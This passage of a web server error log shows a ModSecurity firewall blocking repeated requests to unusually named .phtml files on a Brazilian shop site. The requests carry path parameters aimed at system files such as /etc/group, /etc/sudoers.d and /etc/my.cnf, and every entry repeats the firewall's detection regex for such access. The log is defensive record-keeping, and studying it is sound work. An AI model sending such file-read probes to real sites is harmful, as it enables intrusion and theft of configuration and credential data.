[Thu Mar 19 13:22:08.960538 2026] [:error] [pid 30077:tid 140411548894976] [client 57.141.18.100:49260] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisPu8EFLIOrSqIpu7fAAAAlc"]
[Thu Mar 19 13:22:09.243733 2026] [:error] [pid 17887:tid 140411607643904] [client 57.141.18.17:49264] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisQkwaGbbGflqUZDakgAAANA"]
[Thu Mar 19 13:22:09.263072 2026] [:error] [pid 27403:tid 140411699963648] [client 57.141.18.114:49266] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisRkFeYa1D6dYQnAEOQAAAcU"]
[Thu Mar 19 13:22:09.565267 2026] [:error] [pid 14269:tid 140411557287680] [client 57.141.18.73:49270] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisQbLMZ6AikZjR9VwdwAAABY"]
[Thu Mar 19 13:22:10.039649 2026] [:error] [pid 17887:tid 140411683178240] [client 57.141.18.55:49280] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisgkwaGbbGflqUZDakwAAAMc"]
[Thu Mar 19 13:22:10.503518 2026] [:error] [pid 14269:tid 140411716749056] [client 57.141.18.33:49286] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisgbLMZ6AikZjR9VweAAAAAM"]
[Thu Mar 19 13:22:10.799884 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.43:49290] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisuoXxyEfFpUF8f8f8QAAAUw"]
[Thu Mar 19 13:22:11.236708 2026] [:error] [pid 30077:tid 140411565680384] [client 57.141.18.5:49294] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwis_u8EFLIOrSqIpu7fQAAAlU"]
[Thu Mar 19 13:22:11.535191 2026] [:error] [pid 27403:tid 140411582465792] [client 57.141.18.114:49300] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwisxkFeYa1D6dYQnAEOgAAAdM"]
[Thu Mar 19 13:22:11.797565 2026] [:error] [pid 27403:tid 140411691570944] [client 57.141.18.105:49306] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisxkFeYa1D6dYQnAEOwAAAcY"]
[Thu Mar 19 13:22:12.191845 2026] [:error] [pid 14269:tid 140411691570944] [client 57.141.18.3:49320] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwitAbLMZ6AikZjR9VwegAAAAY"]
[Thu Mar 19 13:22:12.887616 2026] [:error] [pid 31803:tid 140411557287680] [client 57.141.18.30:49332] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwitOyqAr6etmhZHNpy4QAAAFY"]
[Thu Mar 19 13:22:13.191793 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.83:49338] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiteoXxyEfFpUF8f8f8gAAAVU"]
[Thu Mar 19 13:22:13.409570 2026] [:error] [pid 30077:tid 140411582465792] [client 57.141.18.111:49340] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwitfu8EFLIOrSqIpu7fgAAAlM"]
[Thu Mar 19 13:22:13.736835 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.7:49348] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwitda6ubjKNq_cu4ZpxQAAA0Q"]
[Thu Mar 19 13:22:13.979569 2026] [:error] [pid 19093:tid 140411616036608] [client 57.141.18.114:49356] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwitV_V7PWP6ixUYl7PqgAAAo8"]
[Thu Mar 19 13:22:14.785857 2026] [:error] [pid 17887:tid 140411599251200] [client 57.141.18.54:49376] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwitgkwaGbbGflqUZDamAAAANE"]
[Thu Mar 19 13:22:14.841109 2026] [:error] [pid 19093:tid 140411557287680] [client 57.141.18.12:49378] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwitl_V7PWP6ixUYl7PqwAAApY"]
[Thu Mar 19 13:22:15.307381 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.107:49390] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwit-oXxyEfFpUF8f8f9AAAAUc"]
[Thu Mar 19 13:22:15.626888 2026] [:error] [pid 30077:tid 140411557287680] [client 57.141.18.89:49394] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwit_u8EFLIOrSqIpu7fwAAAlY"]
[Thu Mar 19 13:22:16.049018 2026] [:error] [pid 31803:tid 140411574073088] [client 57.141.18.50:49404] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiuOyqAr6etmhZHNpy5AAAAFQ"]
[Thu Mar 19 13:22:16.408521 2026] [:error] [pid 27403:tid 140411624429312] [client 57.141.18.29:49410] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiuBkFeYa1D6dYQnAEPAAAAc4"]
[Thu Mar 19 13:22:16.494211 2026] [:error] [pid 17887:tid 140411565680384] [client 57.141.18.116:49412] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiuAkwaGbbGflqUZDamQAAANU"]
[Thu Mar 19 13:22:17.038705 2026] [:error] [pid 30077:tid 140411674785536] [client 57.141.18.89:49426] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiufu8EFLIOrSqIpu7gAAAAkg"]
[Thu Mar 19 13:22:17.173245 2026] [:error] [pid 19093:tid 140411666392832] [client 57.141.18.101:49428] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiuV_V7PWP6ixUYl7PrAAAAok"]
[Thu Mar 19 13:22:17.746143 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.29:49436] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiueoXxyEfFpUF8f8f9gAAAVQ"]
[Thu Mar 19 13:22:18.394073 2026] [:error] [pid 30077:tid 140411699963648] [client 57.141.18.37:49448] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiuvu8EFLIOrSqIpu7ggAAAkU"]
[Thu Mar 19 13:22:18.869901 2026] [:error] [pid 30077:tid 140411658000128] [client 57.141.18.112:49458] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiuvu8EFLIOrSqIpu7gwAAAko"]
[Thu Mar 19 13:22:19.160923 2026] [:error] [pid 31803:tid 140411741927168] [client 57.141.18.97:49462] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id 